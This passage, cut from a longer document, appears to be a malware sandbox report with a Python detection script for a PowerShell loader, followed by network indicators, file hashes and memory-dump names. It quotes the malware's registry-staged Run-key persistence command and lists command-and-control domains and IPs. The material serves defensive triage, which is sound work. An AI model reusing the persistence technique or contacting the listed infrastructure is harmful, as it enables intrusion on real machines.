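                 r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Reylon.vbs"'),
    ProcessEvent(564, 100, PS64, f'"{PS64}" {STAGE}'),
    ProcessEvent(2348, 564, PS32, f'"{PS32}" {STAGE}'),
    ProcessEvent(2668, 2348, IEINSTAL, f'"{IEINSTAL}"'),
]
THREAD_CTX = [ThreadContextEvent(2348, 2668)]  # the report's SetThreadContext row
RUN_VALUES = [  # first copied from the report; second is a constructed benign control
    RunValue("Kalibr", "%Della% -w 1 $Exostrad=(Get-ItemProperty -Path 'HKCU:\\Outglari\\').Part;%Della% ($Exostrad)"),
    RunValue("OneDrive", r'"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
]

# Environment variables a Run value legitimately starts with; anything else
# (here %Della%) is attacker-controlled and must have been planted earlier.
KNOWN_ENV = {"SYSTEMROOT", "WINDIR", "PROGRAMFILES", "PROGRAMFILES(X86)", "APPDATA",
             "LOCALAPPDATA", "USERPROFILE", "TEMP", "TMP", "PUBLIC", "PROGRAMDATA"}
ENV_RE = re.compile(r"%([^%]+)%")


def script_part(cmdline: str) -> str:
    """Everything after the quoted image path, i.e. the -Command text."""
    return cmdline.partition('" ')[2]


def check_processes(procs: list) -> list:
    by_pid = {p.pid: p for p in procs}
    findings = []
    for p in procs:
        parent = by_pid.get(p.ppid)
        if parent is None:
            continue
        # Rule 1: 64-bit PowerShell re-launching its own script via the WOW64 copy.
        if "syswow64" in p.image.lower() and parent.image.lower() == PS64.lower():
            same = script_part(p.cmdline) == script_part(parent.cmdline)
            findings.append(("ps64_to_ps32_respawn", p.pid, "same script" if same else "different script"))
        # Rule 2: a signed Microsoft binary started by PowerShell with no arguments,
        # the shape of a process-hollowing host.
        if p.image.lower().endswith(r"\ieinstal.exe") and "powershell" in parent.image.lower() \
                and p.cmdline.strip() == f'"{p.image}"':
            findings.append(("argless_ieinstal_from_powershell", p.pid, parent.pid))
    return findings


def check_thread_context(events: list, procs: list) -> list:
    """Rule 3: SetThreadContext from a PowerShell process into a different image."""
    by_pid = {p.pid: p for p in procs}
    out = []
    for e in events:
        src, dst = by_pid.get(e.source_pid), by_pid.get(e.target_pid)
        if src and dst and "powershell" in src.image.lower() and dst.image.lower() != src.image.lower():
            out.append(("setthreadcontext_cross_process", e.source_pid, e.target_pid))
    return out


def check_run_values(values: list) -> list:
    """Rule 4: Run value that expands an unknown %VAR% and reads its payload
    back out of an HKCU key with Get-ItemProperty."""
    out = []
    for v in values:
        unknown_env = [e for e in ENV_RE.findall(v.data) if e.upper() not in KNOWN_ENV]
        reg_stage = re.search(r"Get-ItemProperty\s+-Path\s+'HK", v.data, re.I) is not None
        if unknown_env and reg_stage:
            out.append(("run_key_registry_stage", v.name, unknown_env[0]))
    return out


def triage(procs: list, thread_events: list, run_values: list) -> list:
    return check_processes(procs) + check_thread_context(thread_events, procs) + check_run_values(run_values)


if __name__ == "__main__":
    for f in triage(PROCS, THREAD_CTX, RUN_VALUES):
        print(f)
```

Rule 4 is the one that survives a reboot analysis: the payload referenced by `HKCU:\Outglari\Part` never appears in the Files list, so a disk-only hunt would miss it; the `%Della%` expansion also tells you to look for where that variable was set, which this report does not show.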
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.81.21.72.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.233.44.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.121.18.2.in-addr.arpa | udp |
| TR | 194.55.224.183:80 | 194.55.224.183 | tcp |
| US | 8.8.8.8:53 | 183.224.55.194.in-addr.arpa | udp |
| TR | 194.55.224.183:80 | 194.55.224.183 | tcp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.131.241.8.in-addr.arpa | udp |
| TR | 194.55.224.183:80 | 194.55.224.183 | tcp |
| US | 8.8.8.8:53 | top.abuse1disabled.xyz | udp |
| NL | 134.19.179.139:5631 | top.abuse1disabled.xyz | tcp |
| US | 8.8.8.8:53 | sub.abuse2disabled.xyz | udp |
| US | 199.249.230.37:5631 | sub.abuse2disabled.xyz | tcp |
| DE | 38.242.234.206:5631 | | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | 206.234.242.38.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.173.189.20.in-addr.arpa | udp |
Files
memory/3396-142-0x000001F1C1E80000-0x000001F1C1EA2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_byf0oizh.rtb.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3396-147-0x000001F1A99F0000-0x000001F1A9A00000-memory.dmp
memory/3396-148-0x000001F1A99F0000-0x000001F1A9A00000-memory.dmp
memory/3396-149-0x000001F1A99F0000-0x000001F1A9A00000-memory.dmp
memory/1580-150-0x0000000002D00000-0x0000000002D36000-memory.dmp
memory/1580-151-0x0000000002D40000-0x0000000002D50000-memory.dmp
memory/1580-152-0x00000000056F0000-0x0000000005D18000-memory.dmp
memory/1580-153-0x0000000005D70000-0x0000000005D92000-memory.dmp
memory/1580-154-0x0000000005E20000-0x0000000005E86000-memory.dmp
memory/1580-155-0x0000000005E90000-0x0000000005EF6000-memory.dmp
memory/1580-165-0x0000000002D40000-0x0000000002D50000-memory.dmp
memory/1580-166-0x0000000006600000-0x000000000661E000-memory.dmp
memory/1580-167-0x0000000002D40000-0x0000000002D50000-memory.dmp
memory/1580-168-0x0000000007E50000-0x00000000084CA000-memory.dmp
memory/1580-169-0x0000000006BB0000-0x0000000006BCA000-memory.dmp
memory/1580-170-0x00000000078A0000-0x0000000007936000-memory.dmp
memory/1580-171-0x0000000007800000-0x0000000007822000-memory.dmp
memory/1580-172-0x0000000008A80000-0x0000000009024000-memory.dmp
memory/1580-173-0x0000000007C30000-0x0000000007C44000-memory.dmp
memory/3396-174-0x000001F1A99F0000-0x000001F1A9A00000-memory.dmp
memory/3396-175-0x000001F1A99F0000-0x000001F1A9A00000-memory.dmp
memory/3396-176-0x000001F1A99F0000-0x000001F1A9A00000-memory.dmp
memory/1580-177-0x0000000002D40000-0x0000000002D50000-memory.dmp
memory/1580-178-0x0000000002D40000-0x0000000002D50000-memory.dmp
memory/1580-179-0x0000000002D40000-0x0000000002D50000-memory.dmp
memory/1580-181-0x0000000007CD0000-0x0000000007CD1000-memory.dmp
memory/1580-182-0x0000000009030000-0x000000000C9F7000-memory.dmp
memory/3368-183-0x0000000001000000-0x00000000049C7000-memory.dmp
memory/3368-184-0x0000000001000000-0x00000000049C7000-memory.dmp
memory/3368-186-0x0000000001000000-0x00000000049C7000-memory.dmp